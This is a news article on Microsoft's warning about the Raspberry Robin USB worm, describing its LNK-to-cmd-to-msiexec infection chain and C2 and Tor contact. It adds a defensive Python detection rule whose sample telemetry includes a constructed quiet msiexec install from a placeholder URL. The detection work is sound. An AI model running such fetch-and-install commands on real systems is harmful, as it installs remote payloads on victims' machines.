Microsoft Detects Raspberry Robin Windows Worm in Hundreds of Enterprise Networks


Microsoft has warned customers about a new high-risk worm called “Raspberry Robin” that is infecting Windows PCs. The software giant has privately informed some Microsoft Defender for Endpoint users that the malware has been discovered in hundreds of enterprise networks across various industries (via Bleeping Computer).

The Red Canary cybersecurity researchers first discovered Raspberry Robin in September last year. The researchers found that the worm spreads to new Windows machines via an infected USB drive that contains a .LNK file. Once the user clicks on the file, the malware uses the command prompt (cmd.exe) to launch a “msiexec” process, which runs another malicious file on the compromised PC.

Additionally, the worm establishes a connection with its command and control (C2) server and uses built-in Windows utilities to install additional malicious payloads on the victim’s system. The dropped DLL files then attempt to communicate with Tor nodes.

Raspberry Robin worm infection flow (Source: Red Canary)

Microsoft explained in its security advisory that the Raspberry Robin worm has been connecting to several IP addresses on the Tor network. However, the attackers have yet to use this foothold to deploy ransomware or steal sensitive data from infected Windows devices.

Microsoft categorizes Raspberry Robin as a high-risk campaign

Microsoft has classified Raspberry Robin as a high-risk campaign because it could allow the threat actors to infect entire corporate networks. Red Canary’s researchers have detailed some indicators to help IT admins detect the Raspberry Robin malware.

“To detect suspicious use of msiexec.exe by Raspberry Robin or other threats, it’s essential to take a look at the command line and the URL. Detecting msiexec.exe making outbound network connections to download and install packages in the command line interface will give you the opportunity to examine the activity and determine if it’s malicious or not,” Red Canary researchers explained.
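As an added illustration of the detection advice quoted above (example code written for this page, not from Red Canary or Microsoft), the rule below flags msiexec.exe launches whose command line names an http(s) URL and notes two aggravating details, a quiet-install switch and a cmd.exe parent; the process-event fields, the sample events and the placeholder hostname are all assumed and constructed.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Matches an http(s) URL anywhere in a command line.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# msiexec quiet-mode switches (/q, /qn, /qb, /quiet) that hide the installer UI.
QUIET_RE = re.compile(r"(?:^|\s)/q(?:uiet|n|b)?\b", re.IGNORECASE)

@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record (assumed shape; a Sysmon Event ID 1 or EDR row carries these fields)."""
    image: str          # full path of the new process
    command_line: str   # its command line
    parent_image: str   # full path of the parent process

def msiexec_findings(ev: ProcessEvent) -> Optional[list]:
    """Return reasons if msiexec appears to fetch a package over the network, else None."""
    if not ev.image.lower().endswith("\\msiexec.exe"):
        return None
    url = URL_RE.search(ev.command_line)
    if url is None:
        return None  # local .msi installs are routine admin activity
    reasons = [f"msiexec installing from URL: {url.group(0)}"]
    if QUIET_RE.search(ev.command_line):
        reasons.append("quiet install switch suppresses the installer UI")
    if ev.parent_image.lower().endswith("\\cmd.exe"):
        reasons.append("spawned by cmd.exe (matches the LNK -> cmd -> msiexec chain)")
    return reasons

def scan(events):
    """Map event index -> findings for every event that triggers the rule."""
    return {i: r for i, ev in enumerate(events) if (r := msiexec_findings(ev))}

# Constructed sample telemetry; the hostname is a placeholder, not a real indicator.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\msiexec.exe",
                 r"msiexec /q /i http://placeholder.invalid:8080/pkg.msi",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\msiexec.exe",
                 r"msiexec /i C:\Users\alice\Downloads\Setup.msi",
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r'cmd /c start "" http://placeholder.invalid/not-msiexec',
                 r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS).items():
        print(f"event {i}: " + "; ".join(reasons))
```

Only the first sample event fires; a hit is a prompt to examine the download URL and the parent chain, not a verdict on its own.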

The security researchers have also advised that customers should not connect suspicious USB devices to their Windows PCs, in order to prevent Raspberry Robin infections. If you’re interested, we invite you to check out Red Canary’s report, which provides detailed insights into how the worm works.